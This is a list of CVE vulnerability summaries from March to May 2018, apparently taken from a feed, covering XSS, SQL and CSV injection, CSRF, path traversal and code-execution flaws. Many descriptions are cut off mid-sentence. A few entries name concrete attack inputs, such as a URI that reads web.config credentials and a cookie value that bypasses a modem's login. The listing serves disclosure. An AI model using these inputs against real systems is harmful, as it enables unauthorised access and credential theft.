CVE-2018-10257 6.5
A CSV Injection vulnerability was discovered in HRSALE The Ultimate HRM v1.0.2 that allows a user with low level privileges to inject a command that will be included in the exported CSV file, leading to possible code execution.
01-05-2018 - 15:29 01-05-2018 - 15:29
CVE-2018-10256 6.5
A SQL Injection vulnerability was discovered in HRSALE The Ultimate HRM v1.0.2 that allows a user with low level privileges to directly modify the SQL query.
01-05-2018 - 15:29 01-05-2018 - 15:29
CVE-2018-10255 6.5
A CSV Injection vulnerability was discovered in clustercoding Blog Master Pro v1.0 that allows a user with low level privileges to inject a command that will be included in the exported CSV file, leading to possible code execution.
01-05-2018 - 15:29 01-05-2018 - 15:29
CVE-2016-10036 7.5
Unrestricted file upload vulnerability in ui/artifact/upload in JFrog Artifactory before 4.16 allows remote attackers to (1) deploy an arbitrary servlet application and execute arbitrary code by uploading a war file or (2) possibly write to arbitrary
01-05-2018 - 15:29 01-05-2018 - 15:29
CVE-2018-10365 3.5
An XSS issue was discovered in the Threads to Link plugin 1.3 for MyBB. When editing a thread, the user is given the option to convert the thread to a link. The thread link input box is not properly sanitized.
01-05-2018 - 12:29 01-05-2018 - 12:29
CVE-2018-10371 4.3
An issue was discovered in the wunderfarm WF Cookie Consent plugin 1.1.3 for WordPress. A persistent cross-site scripting vulnerability has been identified in the web interface of the plugin that allows the execution of arbitrary HTML/script code to
01-05-2018 - 09:29 01-05-2018 - 09:29
CVE-2018-10504 6.8
The WebDorado "Form Maker by WD" plugin before 1.12.24 for WordPress allows CSV injection.
27-04-2018 - 12:29 27-04-2018 - 12:29
CVE-2018-7465 3.5
An XSS issue was discovered in VirtueMart before 3.2.14. All the textareas in the backend of the plugin can be closed by simply adding </textarea> to the value and saving the product/config. By editing back the product/config, the editor's browser wi
26-04-2018 - 15:29 26-04-2018 - 15:29
CVE-2018-8716 3.5
WSO2 Identity Server before 5.5.0 has XSS via the dashboard, allowing attacks by low-privileged attackers.
25-04-2018 - 16:29 25-04-2018 - 16:29
CVE-2018-10366 4.3
An issue was discovered in the Users (aka Front-end user management) plugin 1.4.5 for October CMS. XSS exists in the name field.
25-04-2018 - 05:29 25-04-2018 - 05:29
CVE-2018-10310 3.5
A persistent cross-site scripting vulnerability has been identified in the web interface of the Catapult UK Cookie Consent plugin before 2.3.10 for WordPress that allows the execution of arbitrary HTML/script code in the context of a victim's browser
25-04-2018 - 05:29 25-04-2018 - 05:29
CVE-2018-10321 3.5
Frog CMS 0.9.5 has a stored Cross Site Scripting Vulnerability via "Admin Site title" in Settings.
24-04-2018 - 02:29 24-04-2018 - 02:29
CVE-2018-10313 3.5
WUZHI CMS 4.1.0 allows persistent XSS via the form%5Bqq_10%5D parameter to the /index.php?m=member&f=index&v=profile&set_iframe=1 URI.
23-04-2018 - 22:29 23-04-2018 - 22:29
CVE-2018-10312 6.8
index.php?m=member&v=pw_reset in WUZHI CMS 4.1.0 allows CSRF to change the password of a common member.
23-04-2018 - 22:29 23-04-2018 - 22:29
CVE-2018-10311 4.3
A vulnerability was discovered in WUZHI CMS 4.1.0. There is persistent XSS that allows remote attackers to inject arbitrary web script or HTML via the tag[pinyin] parameter to the /index.php?m=tags&f=index&v=add URI.
23-04-2018 - 22:29 23-04-2018 - 22:29
CVE-2018-10309 3.5
The Responsive Cookie Consent plugin before 1.8 for WordPress mishandles number fields, leading to XSS.
23-04-2018 - 22:29 23-04-2018 - 22:29
CVE-2018-8880 5.0
Lutron Quantum BACnet Integration 2.0 (firmware 3.2.243) doesn't check for correct user authentication before showing the /deviceIP information, which leads to internal network information disclosure.
23-04-2018 - 14:29 23-04-2018 - 14:29
CVE-2018-9245 10.0
The Ericsson-LG iPECS NMS A.1Ac login portal has a SQL injection vulnerability in the User ID and password fields that allows users to bypass the login page and execute remote code on the operating system.
22-04-2018 - 09:29 22-04-2018 - 09:29
CVE-2018-10286 4.0
The Ericsson-LG iPECS NMS A.1Ac web application discloses sensitive information such as the NMS admin credentials and the PostgreSQL database credentials to logged-in users via the responses to certain HTTP POST requests. In order to be able to see t
22-04-2018 - 09:29 22-04-2018 - 09:29
CVE-2018-10285 7.5
The Ericsson-LG iPECS NMS A.1Ac web application uses incorrect access control mechanisms. Since the app does not use any sort of session ID, an attacker might bypass authentication.
22-04-2018 - 09:29 22-04-2018 - 09:29
CVE-2018-7747 3.5
Multiple cross-site scripting (XSS) vulnerabilities in the Caldera Forms plugin before 1.6.0-rc.1 for WordPress allow remote attackers to inject arbitrary web script or HTML via vectors involving (1) a greeting message, (2) the email transaction log,
20-04-2018 - 17:29 20-04-2018 - 17:29
CVE-2018-10079 2.1
Geist WatchDog Console 3.2.2 uses a weak ACL for the C:\ProgramData\WatchDog Console directory, which allows local users to modify configuration data by updating (1) config.xml or (2) servers.xml.
20-04-2018 - 17:29 20-04-2018 - 17:29
CVE-2018-10078 3.5
Cross-site scripting (XSS) vulnerability in Geist WatchDog Console 3.2.2 allows remote authenticated administrators to inject arbitrary web script or HTML via a server description.
20-04-2018 - 17:29 20-04-2018 - 17:29
CVE-2018-10077 4.0
XML external entity (XXE) vulnerability in Geist WatchDog Console 3.2.2 allows remote authenticated administrators to read arbitrary files via crafted XML data.
20-04-2018 - 17:29 20-04-2018 - 17:29
CVE-2018-10201 5.0
An issue was discovered in NcMonitorServer.exe in NC Monitor Server in NComputing vSpace Pro 10 and 11. It is possible to read arbitrary files outside the root directory of the web server. This vulnerability could be exploited remotely by a crafted U
20-04-2018 - 04:29 20-04-2018 - 04:29
CVE-2018-10188 6.8
phpMyAdmin 4.8.0 before 4.8.0-1 has CSRF, allowing an attacker to execute arbitrary SQL statements, related to js/db_operations.js, js/tbl_operations.js, libraries/classes/Operations.php, and sql.php.
19-04-2018 - 10:29 19-04-2018 - 10:29
CVE-2018-9137 3.5
Open-AudIT before 2.2 has CSV Injection.
19-04-2018 - 04:29 19-04-2018 - 04:29
CVE-2018-2791 5.8
Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware (subcomponent: Advanced UI). Supported versions that are affected are 11.1.1.8.0, 12.2.1.2.0 and 12.2.1.3.0. Easily exploitable vulnerability allows unauthenticated att
18-04-2018 - 22:29 18-04-2018 - 22:29
CVE-2018-8831 4.3
A Persistent XSS vulnerability exists in Kodi (formerly XBMC) through 17.6 that allows the execution of arbitrary HTML/script code in the context of the victim user's browser via a playlist.
18-04-2018 - 13:29 18-04-2018 - 13:29
CVE-2015-9222 7.8
In Android before 2018-04-05 or earlier security patch level on Qualcomm Snapdragon Mobile and Snapdragon Wear MSM8909W, SD 210/SD 212/SD 205, SD 400, SD 410/12, SD 425, SD 427, SD 430, SD 435, SD 450, SD 625, SD 650/52, SD 800, SD 808, SD 810, SD 82
18-04-2018 - 10:29 18-04-2018 - 10:29
CVE-2018-10070 7.8
A vulnerability in MikroTik Version 6.41.4 could allow an unauthenticated remote attacker to exhaust all available CPU and all available RAM by sending a crafted FTP request on port 21 that begins with many '\0' characters, preventing the affected ro
17-04-2018 - 21:29 16-04-2018 - 17:29
CVE-2018-10063 6.8
The Convert Forms extension before 2.0.4 for Joomla! is vulnerable to Remote Command Execution using CSV Injection that is mishandled when exporting a Leads file.
17-04-2018 - 21:29 12-04-2018 - 15:29
CVE-2018-8736 9.0
A privilege escalation vulnerability in Nagios XI 5.2.x through 5.4.x before 5.4.13 allows an attacker to leverage an RCE vulnerability escalating to root.
17-04-2018 - 20:29 17-04-2018 - 20:29
CVE-2018-8735 9.0
Remote command execution (RCE) vulnerability in Nagios XI 5.2.x through 5.4.x before 5.4.13 allows an attacker to execute arbitrary commands on the target system, aka OS command injection.
17-04-2018 - 20:29 17-04-2018 - 20:29
CVE-2018-8734 7.5
SQL injection vulnerability in the core config manager in Nagios XI 5.2.x through 5.4.x before 5.4.13 allows an attacker to execute arbitrary SQL commands via the selInfoKey1 parameter.
17-04-2018 - 20:29 17-04-2018 - 20:29
CVE-2018-8733 6.4
Authentication bypass vulnerability in the core config manager in Nagios XI 5.2.x through 5.4.x before 5.4.13 allows an unauthenticated attacker to make configuration changes and leverage an authenticated SQL injection vulnerability.
17-04-2018 - 20:29 17-04-2018 - 20:29
CVE-2018-5430 4.0
The Spring web flows of TIBCO Software Inc.'s TIBCO JasperReports Server, TIBCO JasperReports Server Community Edition, TIBCO JasperReports Server for ActiveMatrix BPM, TIBCO Jaspersoft for AWS with Multi-Tenancy, and TIBCO Jaspersoft Reporting and A
17-04-2018 - 14:29 17-04-2018 - 14:29
CVE-2018-9843 7.5
The REST API in CyberArk Password Vault Web Access before 9.9.5 and 10.x before 10.1 allows remote attackers to execute arbitrary code via a serialized .NET object in an Authorization HTTP header.
16-04-2018 - 05:58 12-04-2018 - 11:29
CVE-2018-10118 3.5
Monstra CMS 3.0.4 has Stored XSS via the Name field on the Create New Page screen under the admin/index.php?id=pages URI, related to plugins/box/pages/pages.admin.php.
16-04-2018 - 05:58 16-04-2018 - 05:58
CVE-2018-10109 3.5
Monstra CMS 3.0.4 has a stored XSS vulnerability when an attacker has access to the editor role, and enters the payload in the content section of a new page in the blog catalog.
16-04-2018 - 05:58 16-04-2018 - 05:58
CVE-2018-10080 5.0
Secutech RiS-11, RiS-22, and RiS-33 devices with firmware V5.07.52_es_FRI01 allow DNS settings changes via a goform/AdvSetDns?GO=wan_dns.asp request in conjunction with a crafted admin cookie.
13-04-2018 - 00:29 13-04-2018 - 00:29
CVE-2018-10068 4.3
The jDownloads extension before 3.2.59 for Joomla! has XSS.
12-04-2018 - 14:29 12-04-2018 - 14:29
CVE-2018-9155 3.5
Cross-site scripting (XSS) vulnerability in Open-AudIT Professional 2.1.1 allows remote attackers to inject arbitrary web script or HTML via a crafted name of a component, as demonstrated by the Admin->Logs section (with a logs?logs.type= URI) and th
12-04-2018 - 11:29 12-04-2018 - 11:29
CVE-2018-9118 5.0
exports/download.php in the 99 Robots WP Background Takeover Advertisements plugin before 4.1.5 for WordPress has Directory Traversal via a .. in the filename parameter.
12-04-2018 - 11:29 12-04-2018 - 11:29
CVE-2018-9038 5.5
Monstra CMS 3.0.4 allows remote attackers to delete files via an admin/index.php?id=filesmanager&delete_dir=./&path=uploads/ request.
10-04-2018 - 14:29 10-04-2018 - 14:29
CVE-2018-9037 6.5
Monstra CMS 3.0.4 allows remote code execution via an upload_file request for a .zip file, which is automatically extracted and may contain .php files.
10-04-2018 - 14:29 10-04-2018 - 14:29
CVE-2017-14611 6.4
SSRF (Server Side Request Forgery) in Cockpit 0.13.0 allows remote attackers to read arbitrary files or send TCP traffic to intranet hosts via the url parameter, related to use of the discontinued aheinze/fetch_url_contents component.
10-04-2018 - 11:29 10-04-2018 - 11:29
CVE-2018-9926 6.8
An issue was discovered in WUZHI CMS 4.1.0. There is a CSRF vulnerability that can add an admin account via index.php?m=core&f=power&v=add.
10-04-2018 - 02:29 10-04-2018 - 02:29
CVE-2018-1217 5.0
Avamar Installation Manager in Dell EMC Avamar Server 7.3.1, 7.4.1, and 7.5.0, and Dell EMC Integrated Data Protection Appliance 2.0 and 2.1, is affected by a missing access control check vulnerability which could potentially allow a remote unauthent
09-04-2018 - 16:29 09-04-2018 - 16:29
CVE-2018-9857 4.3
PHP Scripts Mall Match Clone Script 1.0.4 has XSS via the search field to searchbyid.php (aka the "View Search By Id" screen).
09-04-2018 - 03:29 09-04-2018 - 03:29
CVE-2018-9844 4.3
The Iptanus WordPress File Upload plugin before 4.3.4 for WordPress mishandles Settings attributes, leading to XSS.
07-04-2018 - 03:29 07-04-2018 - 03:29
CVE-2018-1270 7.5
Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to expose STOMP over WebSocket endpoints with a simple, in-memory STOMP broker through the spring-messaging module. A ma
06-04-2018 - 09:29 06-04-2018 - 09:29
CVE-2018-9126 5.0
The DNNArticle module 11 for DNN (formerly DotNetNuke) allows remote attackers to read the web.config file, and consequently discover database credentials, via the /GetCSS.ashx/?CP=%2fweb.config URI.
04-04-2018 - 15:29 04-04-2018 - 15:29
CVE-2018-9035 6.8
CSV Injection vulnerability in ExportToCsvUtf8.php of the Contact Form 7 to Database Extension plugin 2.10.32 for WordPress allows remote attackers to inject spreadsheet formulas into CSV files via the contact form.
04-04-2018 - 15:29 04-04-2018 - 15:29
CVE-2018-9034 3.5
Cross-site scripting (XSS) vulnerability in lib/interface.php of the Relevanssi plugin 4.0.4 for WordPress allows remote attackers to inject arbitrary JavaScript or HTML via the tab GET parameter.
04-04-2018 - 15:29 04-04-2018 - 15:29
CVE-2018-8719 5.0
An issue was discovered in the WP Security Audit Log plugin 3.1.1 for WordPress. Access to wp-content/uploads/wp-security-audit-log/* files is not restricted. For example, these files are indexed by Google and allows for attackers to possibly find se
04-04-2018 - 15:29 04-04-2018 - 15:29
CVE-2018-9248 7.5
FiberHome VDSL2 Modem HG 150-UB devices allow authentication bypass via a "Cookie: Name=0admin" header.
04-04-2018 - 11:29 04-04-2018 - 11:29
CVE-2018-9205 5.0
Vulnerability in avatar_uploader v7.x-1.0-beta8 , The code in view.php doesn't verify users or sanitize the file path.
04-04-2018 - 11:29 04-04-2018 - 11:29
CVE-2018-8814 5.8
Cross-site request forgery (CSRF) vulnerability in WolfCMS 0.8.3.1 allows remote attackers to hijack the authentication of users for requests that modify plugin/[pluginname]/settings by crafting a malicious request.
04-04-2018 - 11:29 04-04-2018 - 11:29
CVE-2018-8813 4.9
Open redirect vulnerability in the login[redirect] parameter login functionality in WolfCMS 0.8.3.1 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a malformed URL.
04-04-2018 - 11:29 04-04-2018 - 11:29
CVE-2018-9238 4.3
proberv.php in Yahei-PHP Proberv 0.4.7 has XSS via the funName parameter.
04-04-2018 - 03:29 04-04-2018 - 03:29
CVE-2018-9237 3.5
iScripts EasyCreate 3.2.1 has Stored Cross-Site Scripting in the "Site Description" field.
04-04-2018 - 03:29 04-04-2018 - 03:29
CVE-2018-9236 3.5
iScripts EasyCreate 3.2.1 has Stored Cross-Site Scripting in the "Site title" field.
04-04-2018 - 03:29 04-04-2018 - 03:29
CVE-2018-9235 4.3
iScripts SonicBB 1.0 has Reflected Cross-Site Scripting via the query parameter to search.php.
04-04-2018 - 03:29 04-04-2018 - 03:29
CVE-2018-9183 3.5
The Joom Sky JS Jobs extension before 1.2.1 for Joomla! has XSS.
02-04-2018 - 11:29 02-04-2018 - 11:29
CVE-2018-9163 3.5
A stored Cross-site scripting (XSS) vulnerability in Zoho ManageEngine Recovery Manager Plus before 5.3 (Build 5350) allows remote authenticated users (with Add New Technician permissions) to inject arbitrary web script or HTML via the loginName fiel
02-04-2018 - 08:29 02-04-2018 - 08:29
CVE-2018-9173 4.3
Cross-site scripting (XSS) vulnerability in admin/template/js/uploadify/uploadify.swf in GetSimple CMS 3.3.13 allows remote attackers to inject arbitrary web script or HTML, as demonstrated by the movieName parameter.
01-04-2018 - 23:29 01-04-2018 - 23:29
CVE-2018-9172 3.5
The Iptanus WordPress File Upload plugin before 4.3.3 for WordPress mishandles shortcode attributes.
01-04-2018 - 19:29 01-04-2018 - 19:29
CVE-2018-6849 4.3
In the WebRTC component in DuckDuckGo 4.2.0, after visiting a web site that attempts to gather complete client information (such as https://ip.voidsec.com), the browser can disclose a private IP address in a STUN request.
01-04-2018 - 14:29 01-04-2018 - 14:29
CVE-2018-9162 7.5
Contec Smart Home 4.15 devices do not require authentication for new_user.php, edit_user.php, delete_user.php, and user.php, as demonstrated by changing the admin password and then obtaining control over doors.
31-03-2018 - 18:29 31-03-2018 - 18:29
CVE-2018-9161 7.5
Prisma Industriale Checkweigher PrismaWEB 1.21 allows remote attackers to discover the hardcoded prisma password for the prismaweb account by reading user/scripts/login_par.js.
31-03-2018 - 18:29 31-03-2018 - 18:29
CVE-2018-8908 6.8
An issue was discovered in /admin/?/user/add in Frog CMS 0.9.5. The application's add user functionality suffers from CSRF. A malicious user can craft an HTML page and use it to trick a victim into clicking on it; once executed, a malicious user will
31-03-2018 - 18:29 31-03-2018 - 18:29
CVE-2018-9160 5.0
SickRage before v2018.03.09-1 includes cleartext credentials in HTTP responses.
31-03-2018 - 17:29 31-03-2018 - 17:29
CVE-2018-7203 4.3
Cross-site scripting (XSS) vulnerability in Twonky Server 7.0.11 through 8.5 allows remote attackers to inject arbitrary web script or HTML via the friendlyname parameter to rpc/set_all.
30-03-2018 - 17:29 30-03-2018 - 17:29
CVE-2018-7171 5.0
Directory traversal vulnerability in Twonky Server 7.0.11 through 8.5 allows remote attackers to share the contents of arbitrary directories via a .. (dot dot) in the contentbase parameter to rpc/set_all.
30-03-2018 - 17:29 30-03-2018 - 17:29
CVE-2018-5708 6.1
An issue was discovered on D-Link DIR-601 B1 2.02NA devices. Being on the same local network as, but being unauthenticated to, the administrator's panel, a user can obtain the admin username and cleartext password in the response (specifically, the c
30-03-2018 - 17:29 30-03-2018 - 17:29
CVE-2018-9148 5.0
Western Digital WD My Cloud v04.05.00-320 devices embed the session token (aka PHPSESSID) in filenames, which makes it easier for attackers to bypass authentication by listing a directory. NOTE: this can be exploited in conjunction with CVE-2018-7171
30-03-2018 - 15:29 30-03-2018 - 15:29
CVE-2018-7600 7.5
Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.
29-03-2018 - 03:29 29-03-2018 - 03:29
CVE-2018-9107 6.8
CSV Injection (aka Excel Macro Injection or Formula Injection) exists in the export feature in the Acyba AcyMailing extension before 5.9.6 for Joomla! via a value that is mishandled in a CSV export.
28-03-2018 - 00:29 28-03-2018 - 00:29
CVE-2018-9106 6.8
CSV Injection (aka Excel Macro Injection or Formula Injection) exists in the export feature in the Acyba AcySMS extension before 3.5.1 for Joomla! via a value that is mishandled in a CSV export.
28-03-2018 - 00:29 28-03-2018 - 00:29
CVE-2018-9092 6.8
There is a CSRF vulnerability in mc-admin/conf.php in MiniCMS 1.10 that can change the administrator account password.
27-03-2018 - 18:29 27-03-2018 - 18:29
CVE-2018-8718 6.0
Cross-site request forgery (CSRF) vulnerability in the Mailer Plugin 1.20 for Jenkins 2.111 allows remote authenticated users to send unauthorized mail as an arbitrary user via a /descriptorByName/hudson.tasks.Mailer/sendTestMail request.
27-03-2018 - 12:29 27-03-2018 - 12:29
CVE-2018-9032 7.5
An authentication bypass vulnerability on D-Link DIR-850L Wireless AC1200 Dual Band Gigabit Cloud Router (Hardware Version : A1, B1; Firmware Version : 1.02-2.06) devices potentially allows attackers to bypass SharePort Web Access Portal by directly
26-03-2018 - 23:29 26-03-2018 - 23:29
CVE-2018-7543 4.3
Cross-site scripting (XSS) vulnerability in installer/build/view.step4.php of the SnapCreek Duplicator plugin 1.2.32 for WordPress allows remote attackers to inject arbitrary JavaScript or HTML via the json parameter.
26-03-2018 - 14:29 26-03-2018 - 14:29
CVE-2018-1213 6.8
Dell EMC Isilon OneFS versions between 8.1.0.0 - 8.1.0.1, 8.0.1.0 - 8.0.1.2, and 8.0.0.0 - 8.0.0.6, versions 7.2.1.x, and version 7.1.1.11 and 8.1.0.2 is affected by a cross-site request forgery vulnerability. A malicious user may potentially exploit
26-03-2018 - 14:29 26-03-2018 - 14:29
CVE-2018-1204 7.2
Dell EMC Isilon OneFS versions between 8.1.0.0 - 8.1.0.1, 8.0.1.0 - 8.0.1.2, and 8.0.0.0 - 8.0.0.6, versions 7.2.1.x, and version 7.1.1.11 is affected by a path traversal vulnerability in the isi_phone_home tool. A malicious compadmin may potentially
26-03-2018 - 14:29 26-03-2018 - 14:29
CVE-2018-1203 7.2
In Dell EMC Isilon OneFS, the compadmin is able to run tcpdump binary with root privileges. In versions between 8.1.0.0 - 8.1.0.1, 8.0.1.0 - 8.0.1.2, and 8.0.0.0 - 8.0.0.6, the tcpdump binary, being run with sudo, may potentially be used by compadmin
26-03-2018 - 14:29 26-03-2018 - 14:29
CVE-2018-1202 3.5
Dell EMC Isilon versions between 8.1.0.0 - 8.1.0.1, 8.0.1.0 - 8.0.1.2, and 8.0.0.0 - 8.0.0.6, and version 7.1.1.11 is affected by a cross-site scripting vulnerability in the NDMP Page within the OneFS web administration interface. A malicious adminis
26-03-2018 - 14:29 26-03-2018 - 14:29
CVE-2018-1201 3.5
Dell EMC Isilon versions between 8.1.0.0 - 8.1.0.1, 8.0.1.0 - 8.0.1.2, and 8.0.0.0 - 8.0.0.6, versions 7.2.1.x, and version 7.1.1.11 is affected by a cross-site scripting vulnerability in the Job Operations Page within the OneFS web administration in
26-03-2018 - 14:29 26-03-2018 - 14:29
CVE-2018-1189 3.5
Dell EMC Isilon versions between 8.1.0.0 - 8.1.0.1, 8.0.1.0 - 8.0.1.2, and 8.0.0.0 - 8.0.0.6, versions 7.2.1.x, and version 7.1.1.11 is affected by a cross-site scripting vulnerability in the Antivirus Page within the OneFS web administration interfa
26-03-2018 - 14:29 26-03-2018 - 14:29
CVE-2018-1188 3.5
Dell EMC Isilon versions between 8.1.0.0 - 8.1.0.1, 8.0.1.0 - 8.0.1.2, and 8.0.0.0 - 8.0.0.6, and versions 7.2.1.x is affected by a cross-site scripting vulnerability in the Authorization Providers page within the OneFS web administration interface.
26-03-2018 - 14:29 26-03-2018 - 14:29
CVE-2018-1187 3.5
Dell EMC Isilon versions between 8.1.0.0 - 8.1.0.1, 8.0.1.0 - 8.0.1.2, and 8.0.0.0 - 8.0.0.6 is affected by a cross-site scripting vulnerability in the Network Configuration page within the OneFS web administration interface. A malicious administrato
26-03-2018 - 14:29 26-03-2018 - 14:29
CVE-2018-1186 3.5
Dell EMC Isilon versions between 8.1.0.0 - 8.1.0.1, 8.0.1.0 - 8.0.1.2, and 8.0.0.0 - 8.0.0.6, versions 7.2.1.x, and version 7.1.1.11 is affected by a cross-site scripting vulnerability in the Cluster description of the OneFS web administration interf
26-03-2018 - 14:29 26-03-2018 - 14:29
CVE-2018-8979 6.8
Open-AudIT Professional 2.1 has CSRF, as demonstrated by modifying a user account or inserting XSS sequences via the credentials URI.
25-03-2018 - 15:29 25-03-2018 - 15:29
CVE-2018-8817 6.8
Wampserver before 3.1.3 has CSRF in add_vhost.php.
25-03-2018 - 15:29 25-03-2018 - 15:29
CVE-2018-9010 5.0
Intelbras TELEFONE IP TIP200/200 LITE 60.0.75.29 devices allow remote authenticated admins to read arbitrary files via the /cgi-bin/cgiServer.exx page parameter, aka absolute path traversal. In some cases, authentication can be achieved via the admin
25-03-2018 - 14:29 25-03-2018 - 14:29
CVE-2018-8947 5.0
rap2hpoutre Laravel Log Viewer before v0.13.0 relies on Base64 encoding for l, dl, and del requests, which makes it easier for remote attackers to bypass intended access restrictions, as demonstrated by reading arbitrary files via a dl request.
25-03-2018 - 12:29 25-03-2018 - 12:29
CVE-2018-8903 3.5
Open-AudIT Professional 2.1 allows XSS via the Name or Description field on the Credentials screen.
22-03-2018 - 17:29 22-03-2018 - 17:29
CVE-2014-4912 7.5
An Arbitrary File Upload issue was discovered in Frog CMS 0.9.5 due to lack of extension validation.
22-03-2018 - 00:29 22-03-2018 - 00:29
CVE-2014-1665 3.5
Cross-site scripting (XSS) vulnerability in ownCloud before 6.0.1 allows remote authenticated users to inject arbitrary web script or HTML via the filename of an uploaded file.
20-03-2018 - 17:29 20-03-2018 - 17:29
CVE-2018-8815 3.5
Cross-site scripting (XSS) vulnerability in the gallery function in Alkacon OpenCMS 10.5.3 allows remote attackers to inject arbitrary web script or HTML via a malicious SVG image.
20-03-2018 - 03:29 20-03-2018 - 03:29
CVE-2018-8811 6.8
Cross-site request forgery (CSRF) vulnerability in system/workplace/admin/accounts/user_role.jsp in OpenCMS 10.5.3 allows remote attackers to hijack the authentication of administrative users for requests that perform privilege escalation.
20-03-2018 - 03:29 20-03-2018 - 03:29
CVE-2018-8732 3.5
Cross-site scripting (XSS) vulnerability in WampServer 3.1.1 allows remote attackers to inject arbitrary web script or HTML via the virtual_del parameter.
19-03-2018 - 16:29 19-03-2018 - 16:29
CVE-2018-7422 5.0
A Local File Inclusion vulnerability in the Site Editor plugin through 1.1.1 for WordPress allows remote attackers to retrieve arbitrary files via the ajax_path parameter to editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php, aka absol
19-03-2018 - 10:29 19-03-2018 - 10:29
CVE-2018-8770 5.0
Physical path Leakage exists in Western Bridge Cobub Razor 0.8.0 via generate.php, controllers/getConfigTest.php, controllers/getUpdateTest.php, controllers/postclientdataTest.php, controllers/posterrorTest.php, controllers/posteventTest.php, control
18-03-2018 - 02:29 18-03-2018 - 02:29
CVE-2014-4613 4.3
Cross-site request forgery (CSRF) vulnerability in the administration panel in Piwigo before 2.6.2 allows remote attackers to hijack the authentication of administrators for requests that add users via a pwg.users.add action in a request to ws.php.
16-03-2018 - 13:29 16-03-2018 - 13:29
CVE-2018-6230 8.3
A SQL injection vulnerability in an Trend Micro Email Encryption Gateway 5.5 search configuration script could allow an attacker to execute SQL commands to upload and execute arbitrary code that may harm the target system.
15-03-2018 - 15:29 15-03-2018 - 15:29
CVE-2018-6229 10.0
A SQL injection vulnerability in an Trend Micro Email Encryption Gateway 5.5 edit policy script could allow an attacker to execute SQL commands to upload and execute arbitrary code that may harm the target system.
15-03-2018 - 15:29 15-03-2018 - 15:29
CVE-2018-6228 10.0
A SQL injection vulnerability in a Trend Micro Email Encryption Gateway 5.5 policy script could allow an attacker to execute SQL commands to upload and execute arbitrary code that may harm the target system.
15-03-2018 - 15:29 15-03-2018 - 15:29
CVE-2018-6227 3.5
A stored cross-site scripting (XSS) vulnerability in Trend Micro Email Encryption Gateway 5.5 could allow an attacker to inject client-side scripts into vulnerable systems.
15-03-2018 - 15:29 15-03-2018 - 15:29
CVE-2018-6226 3.5
Reflected cross-site scripting (XSS) vulnerabilities in two Trend Micro Email Encryption Gateway 5.5 configuration files could allow an attacker to inject client-side scripts into vulnerable systems.
15-03-2018 - 15:29 15-03-2018 - 15:29
CVE-2018-6225 4.0
An XML external entity injection (XXE) vulnerability in Trend Micro Email Encryption Gateway 5.5 could allow an authenticated user to expose a normally protected configuration script.
15-03-2018 - 15:29 15-03-2018 - 15:29
CVE-2018-6224 6.8
A lack of cross-site request forgery (CSRF) protection vulnerability in Trend Micro Email Encryption Gateway 5.5 could allow an attacker to submit authenticated requests to a user browsing an attacker-controlled domain.
15-03-2018 - 15:29 15-03-2018 - 15:29
CVE-2018-6223 5.0
A missing authentication for appliance registration vulnerability in Trend Micro Email Encryption Gateway 5.5 could allow an attacker to manipulate the registration process of the product to reset configuration parameters.
15-03-2018 - 15:29 15-03-2018 - 15:29
CVE-2018-6222 7.2
Arbitrary logs location in Trend Micro Email Encryption Gateway 5.5 could allow an attacker to change location of log files and be manipulated to execute arbitrary commands and attain command execution on a vulnerable system.
15-03-2018 - 15:29 15-03-2018 - 15:29
CVE-2018-6221 9.3
An unvalidated software update vulnerability in Trend Micro Email Encryption Gateway 5.5 could allow a man-in-the-middle attacker to tamper with an update file and inject their own.
15-03-2018 - 15:29 15-03-2018 - 15:29
CVE-2018-6220 7.5
An arbitrary file write vulnerability in Trend Micro Email Encryption Gateway 5.5 could allow an attacker to inject arbitrary data, which may lead to gaining code execution on vulnerable systems.
15-03-2018 - 15:29 15-03-2018 - 15:29
CVE-2018-6219 6.4
An Insecure Update via HTTP vulnerability in Trend Micro Email Encryption Gateway 5.5 could allow an attacker to eavesdrop and tamper with certain types of update data.
15-03-2018 - 15:29 15-03-2018 - 15:29
CVE-2018-8729 4.3
Multiple cross-site scripting (XSS) vulnerabilities in the Activity Log plugin before 2.4.1 for WordPress allow remote attackers to inject arbitrary JavaScript or HTML via a title that is not escaped.
15-03-2018 - 13:29 15-03-2018 - 13:29
CVE-2018-7707 4.3
Cross-site scripting (XSS) vulnerability in SecurEnvoy SecurMail before 9.2.501 allows remote attackers to inject arbitrary web script or HTML via an HTML-formatted e-mail message.
14-03-2018 - 21:29 14-03-2018 - 21:29
CVE-2018-7706 4.0
Directory traversal vulnerability in SecurEnvoy SecurMail before 9.2.501 allows remote authenticated users to read arbitrary e-mail messages via a .. (dot dot) in the option2 parameter in an attachment action to secmail/getmessage.exe.
14-03-2018 - 21:29 14-03-2018 - 21:29
CVE-2018-7705 5.5
Directory traversal vulnerability in SecurEnvoy SecurMail before 9.2.501 allows remote authenticated users to read e-mail messages to arbitrary recipients via a .. (dot dot) in the filename parameter to secupload2/upload.aspx.
14-03-2018 - 21:29 14-03-2018 - 21:29
CVE-2018-7704 4.0
SecurEnvoy SecurMail before 9.2.501 allows remote authenticated users to read arbitrary e-mail messages via the option1 parameter in a reply action to secmail/getmessage.exe.
14-03-2018 - 21:29 14-03-2018 - 21:29
CVE-2018-7703 4.3
Cross-site scripting (XSS) vulnerability in SecurEnvoy SecurMail before 9.2.501 allows remote attackers to inject arbitrary web script or HTML via the mailboxid parameter to secmail/getmessage.exe.
14-03-2018 - 21:29 14-03-2018 - 21:29
CVE-2018-7702 6.4
SecurEnvoy SecurMail before 9.2.501 allows remote attackers to spoof transmission of arbitrary e-mail messages, resend e-mail messages to arbitrary recipients, or modify arbitrary message bodies and attachments by leveraging missing authentication an
14-03-2018 - 21:29 14-03-2018 - 21:29
CVE-2018-7701 5.8
Multiple cross-site request forgery (CSRF) vulnerabilities in SecurEnvoy SecurMail before 9.2.501 allow remote attackers to hijack the authentication of arbitrary users for requests that (1) delete e-mail messages via a delete action in a request to
14-03-2018 - 21:29 14-03-2018 - 21:29
CVE-2018-0880 6.9
The Desktop Bridge in Windows 10 1607, 1703, and 1709, Windows Server 2016 and Windows Server, version 1709 allows an elevation of privilege vulnerability due to how the virtual registry is managed, aka "Windows Desktop Bridge Elevation of Privilege
14-03-2018 - 13:29 14-03-2018 - 13:29
CVE-2018-0878 2.6
